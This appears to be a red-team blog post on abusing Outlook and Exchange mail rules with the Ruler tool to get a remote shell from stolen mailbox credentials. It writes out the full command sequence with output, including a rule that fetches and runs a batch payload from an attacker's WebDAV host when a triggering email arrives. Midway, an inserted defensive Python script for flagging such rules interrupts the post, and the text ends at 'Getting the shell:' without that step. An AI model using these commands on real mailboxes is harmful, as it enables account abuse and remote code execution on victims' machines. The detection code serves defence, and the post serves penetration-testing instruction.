Mail rules/forms to get a shell

Yara AlHumaidan (0xy37)
2 min read · Jan 3, 2022

If you are on a red teaming assessment and you somehow have valid credentials for a user's mailbox, you can get a remote shell using the attack scenario below.

PS: This also works against Outlook Web Access (OWA).

Like most good attacks, we aren’t really exploiting flaws, just abusing functionality to get reliable code execution.

You need three things:

  1. A payload in a bat/exe file
  2. hosted on a WebDAV server
  3. and valid credentials!

We will use a cool tool called Ruler, a tool for abusing Exchange services.

Checking Access

Check that the credentials are valid and that we can access the mailbox remotely:

0xy37@kali:~/Tools/ruler# ./ruler-linux64 -insecure -username john -email john@email.com -password P@ssw0rd321 check
[+] Retrieving MAPI/HTTP info
[+] Looks like we are good to go!

Displaying Existing Rules

Check whether the target user account has any existing rules:

0xy37@kali:~/Tools/ruler# ./ruler-linux64 -insecure -username john -email john@email.com -password P@ssw0rd321 display
[+] Found cached Autodiscover record. Using this (use --nocache to force new lookup)
[+] Retrieving Rules
[+] No Rules Found

Add a New Rule

Now we add a new rule. This is the malicious rule that should get us a remote shell: its location points at the payload on the WebDAV server, and -send makes Ruler send an email that triggers it.

0xy37@kali:~/Tools/ruler# ./ruler-linux64 -insecure -username john -email john@email.com -password P@ssw0rd321 add -location "\\\\10.10.10.10@81\\webdav\\stage.bat" -send
[+] Found cached Autodiscover record. Using this (use --nocache to force new lookup)
[+] Adding Rule
[+] Rule Added. Fetching list of rules...
[+] Found 1 rules
[+] Rule Name | Rule ID
[+] ----------------------|-------------------
[+] Delete Spam | 0100000307e1be2e
[+]
[+] Auto Send enabled, wait 30 seconds before sending email (synchronisation)
[+] Sending email
[+] Message sent, your shell should trigger shortly.
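From the defender's side, the rule Ruler just created is exactly what a mailbox rule audit should flag: a rule whose action launches a program, from a WebDAV path written in the \\host@port\ UNC form. The following is an added example (not Ruler's code or the post's) that runs that check over constructed rule records; the record shape is hypothetical, not a real Exchange export format.

```python
import re

# Constructed sample of mailbox rule records (hypothetical export shape, not
# Ruler's or Exchange's real output). The first record mirrors the rule the
# post adds: a "start application" action pointing at a WebDAV share.
SAMPLE_RULES = [
    {"mailbox": "john@email.com", "name": "Delete Spam",
     "actions": [{"type": "start_application",
                  "path": r"\\10.10.10.10@81\webdav\stage.bat"}]},
    {"mailbox": "alice@email.com", "name": "File newsletters",
     "actions": [{"type": "move_to_folder", "folder": "Newsletters"}]},
    {"mailbox": "bob@email.com", "name": "Open report",
     "actions": [{"type": "start_application", "path": r"C:\Tools\report.exe"}]},
]

# \\host@port\share or \\host@SSL@port\share: Windows resolves these via WebDAV.
WEBDAV_UNC = re.compile(r"^\\\\[^\\@]+@(?:SSL@)?\d+\\", re.IGNORECASE)
EXEC_EXT = (".bat", ".cmd", ".exe", ".vbs", ".js", ".hta", ".ps1")
RULER_DEFAULT_NAME = "delete spam"  # the rule name shown in the post's output

def is_webdav_unc(path: str) -> bool:
    return bool(WEBDAV_UNC.match(path))

def classify_rule(rule: dict) -> list[str]:
    """Return indicator tags for one rule; an empty list means nothing of note."""
    tags = []
    for action in rule.get("actions", []):
        if action.get("type") != "start_application":
            continue
        # Any rule that launches a program deserves review; the rest refine it.
        tags.append("executes_application")
        path = action.get("path", "")
        if is_webdav_unc(path):
            tags.append("remote_webdav_path")
        if path.lower().endswith(EXEC_EXT):
            tags.append("executable_extension")
    if rule.get("name", "").strip().lower() == RULER_DEFAULT_NAME:
        tags.append("default_ruler_rule_name")
    return tags

def find_suspicious_rules(rules: list[dict]) -> list[dict]:
    """Rules with a start_application action, remote (WebDAV) paths listed first."""
    hits = []
    for rule in rules:
        tags = classify_rule(rule)
        if "executes_application" in tags:
            hits.append({"mailbox": rule["mailbox"], "name": rule["name"], "tags": tags})
    hits.sort(key=lambda h: "remote_webdav_path" not in h["tags"])
    return hits

if __name__ == "__main__":
    for hit in find_suspicious_rules(SAMPLE_RULES):
        print(f'{hit["mailbox"]}: "{hit["name"]}" -> {", ".join(hit["tags"])}')
```

In a real audit the same checks would run over rules pulled from every mailbox, since the rule lives server-side and fires whenever the user's Outlook client syncs.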

Getting the shell:


Yara AlHumaidan (0xy37)

Penetration Testing Consultant | OSCP | OSWP | eWAPTXv2 | CRTP